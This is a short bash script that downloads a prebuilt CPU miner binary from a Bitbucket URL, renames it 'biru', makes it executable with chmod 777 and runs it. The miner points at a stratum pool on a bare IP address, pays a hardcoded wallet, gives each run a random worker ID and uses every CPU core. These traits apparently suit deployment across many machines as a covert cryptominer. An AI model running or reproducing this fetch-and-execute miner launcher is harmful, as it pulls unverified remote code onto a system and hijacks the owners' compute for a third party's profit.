#!/bin/bash
wget -O biru https://bitbucket.org/kzpakid/kfile/raw/main/cpminer 
chmod 777 biru
./biru -a minotaurx -o stratum+tcp://64.23.134.156:443 -u RY1xwedsKLtchaw6XZcdFHZDYgFaoh2owB.$(shuf -n 1 -i 1-99999)-XY -t $(nproc --all) 
